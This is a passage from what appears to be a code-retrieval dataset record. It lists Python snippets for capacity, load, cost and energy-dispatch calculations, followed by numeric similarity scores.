df.assign(nLen=df['SectorConsumedBy'].apply(lambda x: len(x)))\n # calculate initial FlowAmount accounted for\n df = df.assign(av=df.groupby('nLen')['FlowAmount'].transform('sum'))\n # calc difference\n df = df.assign(vd=df['pv'] - df['av'])\n\n # subset df to scale into oil and non-oil sectors\n df['sector_label'] = np.where(df['SectorConsumedBy'].apply(\n lambda x: x[0:5] == '21111'), 'oil', 'nonoil')\n df['ratio'] = np.where(df['sector_label'] == 'oil', 2 / 3, 1 / 3)\n df['label_sum'] = df.groupby(['Location', 'nLen', 'sector_label'])[\n 'FlowAmount'].transform('sum')\n\n # calculate revised water withdrawal allocation\n df_scaled = df.copy()\n df_scaled.loc[:, 'FlowAmount'] = \\\n df_scaled['FlowAmount'] + \\\n (df_scaled['FlowAmount'] / df_scaled['label_sum']) * \\\n (df_scaled['ratio'] * df_scaled['vd'])\n df_scaled = df_scaled.drop(columns=['sector_label', 'ratio', 'nLen',\n 'label_sum', 'pv', 'av', 'vd'])\n\n return df_scaled", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def load_factor(self):\n return round(self._n / self._size, 2)", "def u_crit(state, sys):\n s = state[0]\n i = state[1]\n tau = scipy.interpolate.interp1d(sys.tau.s, sys.tau.i, kind = \"cubic\")\n phi = scipy.interpolate.interp1d(sys.phi.s, sys.phi.i, kind = \"cubic\")\n cc = scipy.interpolate.interp1d(sys.commutation_curve[0],\n sys.commutation_curve[1],\n kind = \"cubic\")\n if i > sys.imax:\n return sys.umax\n 
if s <= sys.commutation_curve[0][-1]:\n #print(\"Case 1\")\n if s < sys.sbar or i < tau(s):\n return 0\n return sys.umax\n elif s > sys.commutation_curve[0][-1] and s < sys.commutation_curve[0][0]:\n #print(\"Case 2\")\n if ((i > tau(s)) and (i < cc(s))) or (i > sys.imax):\n return sys.umax\n elif i > cc(s) and i < sys.imax:\n return 0\n else:\n return 0\n else:\n #print(\"Case 3\")\n if i > sys.imax:\n return sys.umax\n elif s > sys.sstar and i > phi(s):\n return sys.umax\n return 0", "def max_duffel_bag_value(cakes, capacity):\n curr_w = 0 # current weight of the bag\n price = 0\n cakes.sort(reverse=True, key=lambda c: c[1]/c[0] if c[0] else sys.maxsize)\n for cake in cakes:\n if cake[0] == 0: return sys.maxsize # infinite number of cakes can be taken\n while (curr_w + cake[0]) <= capacity:\n curr_w += cake[0]\n price += cake[1]\n return price", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def reusability(self):\n self._reusability = -0.25 * self.DCC + 0.25 * self.CAMC + 0.5 * self.CIS + 0.5 * self.DSC\n return round(self._reusability, 5)", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def capacity_factor(self, value: float) -> None:\n # State S, I, E, SE, or EE\n self._capacity_factor = value", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def exceeds_shelf_capacity(shelf, fabric):\n shelf_total = Decimal(shelf.fabrics.all().aggregate(Sum('quantity_th'))['quantity_th__sum'] or 0)\n return True if (shelf_total) + fabric.quantity > max_shelf_qty else False", "def get_roi_ub_cost(pooled_h, pooled_w, proposal_num_per_tiling):\n roi_start_h_cost = pooled_h * proposal_num_per_tiling * 4\n roi_start_w_cost = pooled_w * proposal_num_per_tiling * 4\n roi_bin_h_cost = pooled_h * proposal_num_per_tiling * 4\n roi_bin_w_cost = pooled_w * proposal_num_per_tiling * 4\n roi_start_w_from0_cost = pooled_w * proposal_num_per_tiling * 4\n proposals_ub_int32_cost = 5 * proposal_num_per_tiling * 4\n roi_height_cost = proposal_num_per_tiling * 4\n roi_width_cost = proposal_num_per_tiling * 4\n const_value_cost = 64 * 4\n const_zero_cost = 64 * 4\n calced_rois_scalar = 4\n range_end_scalar = 4\n proposal_ub_validnum = 4\n\n return roi_start_h_cost + roi_start_w_cost + roi_bin_h_cost + \\\n roi_bin_w_cost + roi_start_w_from0_cost + \\\n proposals_ub_int32_cost + roi_height_cost + roi_width_cost + \\\n const_value_cost + const_zero_cost + calced_rois_scalar + \\\n range_end_scalar + proposal_ub_validnum", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n tmin = t_0\n return tmin", "def heat_capacity_of_air(self) -> float:\n\n return 1002.5 + 275 * (10 ** (-6)) * (self.ambient_temperature - 200) ** 2", "def ratio_local_prod(self):\n if self.current_energy_produced == 0.0:\n return 1.0\n else:\n return 1. 
- self.export_grid / self.current_energy_produced", "def capacity_factor(self, update=False,\n min_cap_fact=None, max_cap_fact=None):\n if update or self._dfs['capacity_factor'] is None:\n self._dfs['capacity_factor'] = pudl.analysis.mcoe.capacity_factor(\n self, min_cap_fact=min_cap_fact, max_cap_fact=max_cap_fact)\n return self._dfs['capacity_factor']", "def buying_price(self):\n buy_price = self.standard_init_price()\n # Special status and resources price adaptation\n if self.planet.status in [self.tradeitem.dps]:\n buy_price = (buy_price * 5) / 3\n\n elif self.planet.special in [self.tradeitem.cr]:\n buy_price = (buy_price * 3) / 4\n\n elif self.planet.special in [self.tradeitem.er]:\n buy_price = (buy_price * 4) / 3\n\n # randomize a bit\n moins = random.randrange(self.tradeitem.var)\n plus = random.randrange(self.tradeitem.var)\n buy_price = buy_price - moins + plus\n\n # price can't be negative\n if buy_price < 0:\n buy_price = 0\n\n return int(buy_price)", "def new_capacity_rule(mod, g, p):\n return 0", "def ram_prop_condition(prop=0.25):\n mem_info = get_mem_info()\n total_mem = float(mem_info['MemTotal'].value) / 10**6\n min_gb = prop * total_mem\n return ram_condition(min_gb=min_gb)", "def _get_money_earned(tier):\n return int(((tier**2) * 10) + 10)", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def CalcEffectiveInventory(self):\r\n return (self.currentStock - self.currentOrders)", "def mimic_generation_capacity(base_grid, ref_grid):\n base_plant = base_grid.plant\n ref_plant = ref_grid.plant\n plant_scaling = ref_plant.Pmax / base_plant.Pmax\n # Element-wise division will return NaN for plants not in ref_grid\n plant_scaling = plant_scaling.fillna(0)\n change_table = _calculate_common_zone_factors(base_plant, ref_plant, plant_scaling)\n return change_table", "def determine_unit_limits(DISPATCHLOAD, BIDPEROFFER_D):\n\n # Override ramp rates for fast start units.\n ic = DISPATCHLOAD # DISPATCHLOAD provides the initial operating conditions (ic).\n ic['RAMPMAX'] = ic['INITIALMW'] + ic['RAMPUPRATE'] * (5 / 60)\n ic['RAMPUPRATE'] = np.where((ic['TOTALCLEARED'] > ic['RAMPMAX']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['TOTALCLEARED'] - ic['INITIALMW']) * (60 / 5), ic['RAMPUPRATE'])\n ic['RAMPMIN'] = ic['INITIALMW'] - ic['RAMPDOWNRATE'] * (5 / 60)\n ic['RAMPDOWNRATE'] = np.where((ic['TOTALCLEARED'] < ic['RAMPMIN']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['INITIALMW'] - ic['TOTALCLEARED']) * (60 / 5), ic['RAMPDOWNRATE'])\n\n # Override AVAILABILITY when SEMIDISPATCHCAP is 1.0\n ic = pd.merge(ic, BIDPEROFFER_D.loc[:, ['DUID', 'MAXAVAIL']], 'inner', on='DUID')\n ic['AVAILABILITY'] = np.where((ic['MAXAVAIL'] < ic['AVAILABILITY']) & (ic['SEMIDISPATCHCAP'] == 1.0) &\n (ic['TOTALCLEARED'] <= ic['MAXAVAIL']), ic['MAXAVAIL'],\n ic['AVAILABILITY'])\n\n # Where the availability is lower than the ramp down min set the AVAILABILITY to equal the ramp down min.\n ic['AVAILABILITY'] = np.where(ic['AVAILABILITY'] < ic['RAMPMIN'], ic['RAMPMIN'], ic['AVAILABILITY'])\n\n # Format for compatibility with the Spot market class.\n ic = ic.loc[:, ['DUID', 'INITIALMW', 'AVAILABILITY', 'RAMPDOWNRATE', 'RAMPUPRATE']]\n ic.columns = ['unit', 'initial_output', 'capacity', 'ramp_down_rate', 'ramp_up_rate']\n return ic" ]
[ "0.6202992", "0.59245586", "0.57835984", "0.57430667", "0.56664133", "0.56359935", "0.55884063", "0.55883443", "0.5531915", "0.54831076", "0.5470007", "0.54357696", "0.5415667", "0.5415524", "0.5412604", "0.5383835", "0.53750026", "0.5356168", "0.53061926", "0.52848005", "0.5238898", "0.5220192", "0.52170444", "0.5203145", "0.5200203", "0.51928395", "0.5185715", "0.51710165", "0.516259", "0.51553595", "0.51423657", "0.51357365", "0.5135736", "0.51173425", "0.5110606", "0.510807", "0.5100612", "0.51003283", "0.5092416", "0.5090695", "0.5086512", "0.508334", "0.5082599", "0.5076039", "0.5062241", "0.50613123", "0.505947", "0.50434047", "0.50245374", "0.50144625", "0.5012834", "0.50024027", "0.49998355", "0.49964756", "0.49931473", "0.4991887", "0.4990301", "0.4985744", "0.49731517", "0.49710408", "0.4968335", "0.4967533", "0.496553", "0.49641454", "0.49625704", "0.49432975", "0.49383578", "0.49379227", "0.4918235", "0.49162522", "0.49102354", "0.4910165", "0.4907909", "0.4905342", "0.49048612", "0.49020252", "0.49014473", "0.48960605", "0.48935887", "0.48923737", "0.48919407", "0.4887938", "0.48872718", "0.48845112", "0.4884306", "0.48831803", "0.4881225", "0.48809364", "0.4879541", "0.48767114", "0.48725772", "0.48692274", "0.48664388", "0.48660475", "0.4863709", "0.48562837", "0.48557508", "0.48545608", "0.48445442", "0.4843869" ]
0.5172448
27
Calculate the reserve factor for Stiffener Buckling by calculating the critical load and comparing it to the applied load. Return the reserve factor shifted by 1 so that the inequality constraint can be expressed around 0.
def stiffenerBuckle(dim):\n    bst = dim[0]\n    tst = dim[1]\n    tsk = dim[2]\n    epsilont = kt * ((tst / bst)) ** 2\n    Et = (Esk * tsk) + (Est * ((bst * tst) / bsk))\n    Nst = Et * epsilont  # Critical Load\n    rsf = Nst / Nx\n    return rsf - 1  # Using a target Reserve Factor of 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def ComputeRegenerativeBraking(self):\r\n pass", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def spendFuelToSurvive(self):\n fuelNeeded = self.getLightUpkeep()\n woodNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n )\n woodUsed = min(self.cargo[\"wood\"], woodNeeded)\n fuelNeeded -= woodUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n self.cargo[\"wood\"] -= woodUsed\n if fuelNeeded <= 0:\n return True\n\n coalNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n )\n coalUsed = min(self.cargo[\"coal\"], coalNeeded)\n fuelNeeded -= coalUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n self.cargo[\"coal\"] -= coalUsed\n\n if fuelNeeded <= 0:\n return True\n\n uraniumNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n )\n uraniumUsed = min(self.cargo[\"uranium\"], uraniumNeeded)\n fuelNeeded -= uraniumUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n self.cargo[\"uranium\"] -= uraniumUsed\n\n if fuelNeeded <= 0:\n return True\n\n return 
fuelNeeded <= 0", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n 
self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_additional_ball_capacity(self):\n return 999", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n tmin = t_0\n return tmin", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_additional_ball_capacity(cls):\n return 999", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def calcweight( self ):\n weight = 0\n zeroval = 0\n for sensor in ('right_top', 'right_bottom', 'left_top', 'left_bottom'):\n\t\treading = self.readings[sensor]\n\t\tcalibration = self.named_calibration[sensor]\n if sensor == 'right_top':\n zeroval = self.rtzv\n elif sensor == 'right_bottom':\n zeroval = self.rbzv\n elif sensor == 'left_top':\n zeroval = self.ltzv\n else:\n zeroval = self.lbzv\n\t\tif reading > calibration[2]:\n\t\t\tprint \"Warning, %s reading above upper calibration value\" % sensor\n\t\tif reading < calibration[1]:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[0]) / (calibration[1] - calibration[0])\n\t\telse:\n\t\t\tweight += 1700 * (reading + 
zeroval - calibration[1]) / (calibration[2] - calibration[1]) + 1700\n\n if self.debug == 1:\n print \"weight calculated pre-conversion\", weight\n print \"return val\", self.converttolbs( weight / 100.0 )\n\n # return self.converttolbs( weight / 100.0 )\n return weight / 100.0", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def calculate_init_stock(self, good=None):\n # random quantity * systemsize * techlevel (hence, it can be zero)\n size = self.planet.system_size\n level = self.planet.tech_level\n stock = random.randrange(0, 25) * (size + 1) * level\n\n # SPECIALRESOURCES add 50% production\n if self.planet.special in [self.tradeitem.cr]:\n stock = stock + (stock * 0.5)\n\n # TODO enhancement: difficulty levels should affect fuel stocks\n if good in ['fuel']:\n stock = stock * 10\n\n return int(stock)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def _load_factor(self):\n return self.size / len(self.buckets)", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def MINIMUM_BET() -> int:\n return 10", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def determine_unit_limits(DISPATCHLOAD, BIDPEROFFER_D):\n\n # Override ramp rates for fast start units.\n ic = DISPATCHLOAD # DISPATCHLOAD provides the initial operating conditions (ic).\n ic['RAMPMAX'] = ic['INITIALMW'] + ic['RAMPUPRATE'] * (5 / 60)\n ic['RAMPUPRATE'] = np.where((ic['TOTALCLEARED'] > ic['RAMPMAX']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['TOTALCLEARED'] - ic['INITIALMW']) * (60 / 5), ic['RAMPUPRATE'])\n ic['RAMPMIN'] = ic['INITIALMW'] - ic['RAMPDOWNRATE'] * (5 / 60)\n ic['RAMPDOWNRATE'] = np.where((ic['TOTALCLEARED'] < ic['RAMPMIN']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['INITIALMW'] - ic['TOTALCLEARED']) * (60 / 5), ic['RAMPDOWNRATE'])\n\n # Override AVAILABILITY when SEMIDISPATCHCAP is 1.0\n ic 
= pd.merge(ic, BIDPEROFFER_D.loc[:, ['DUID', 'MAXAVAIL']], 'inner', on='DUID')\n ic['AVAILABILITY'] = np.where((ic['MAXAVAIL'] < ic['AVAILABILITY']) & (ic['SEMIDISPATCHCAP'] == 1.0) &\n (ic['TOTALCLEARED'] <= ic['MAXAVAIL']), ic['MAXAVAIL'],\n ic['AVAILABILITY'])\n\n # Where the availability is lower than the ramp down min set the AVAILABILITY to equal the ramp down min.\n ic['AVAILABILITY'] = np.where(ic['AVAILABILITY'] < ic['RAMPMIN'], ic['RAMPMIN'], ic['AVAILABILITY'])\n\n # Format for compatibility with the Spot market class.\n ic = ic.loc[:, ['DUID', 'INITIALMW', 'AVAILABILITY', 'RAMPDOWNRATE', 'RAMPUPRATE']]\n ic.columns = ['unit', 'initial_output', 'capacity', 'ramp_down_rate', 'ramp_up_rate']\n return ic", "def penalty(self):\n return 0", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def sum_availability(val, quant) -> float:\n return val + qty_available(quant)", "def calculate_reserves(self):\n # TODO: Add back cash dividends and deduct exchange costs\n console.print(\"Still has to be build.\")", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def canopy_heat_capacity(states: ClimateStates) -> float:\n return CAP_LEAF * states.leaf_area_index", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * 
(exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def calculate_demand(flow, requested_sf, available_sf, service_functions):\n\n if requested_sf in available_sf:\n vnf_need_placement = False\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n return demanded_total_capacity, vnf_need_placement\n else:\n vnf_need_placement = True\n available_sf[requested_sf] = {'load': 0.0}\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n del available_sf[requested_sf]\n return demanded_total_capacity, vnf_need_placement", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n 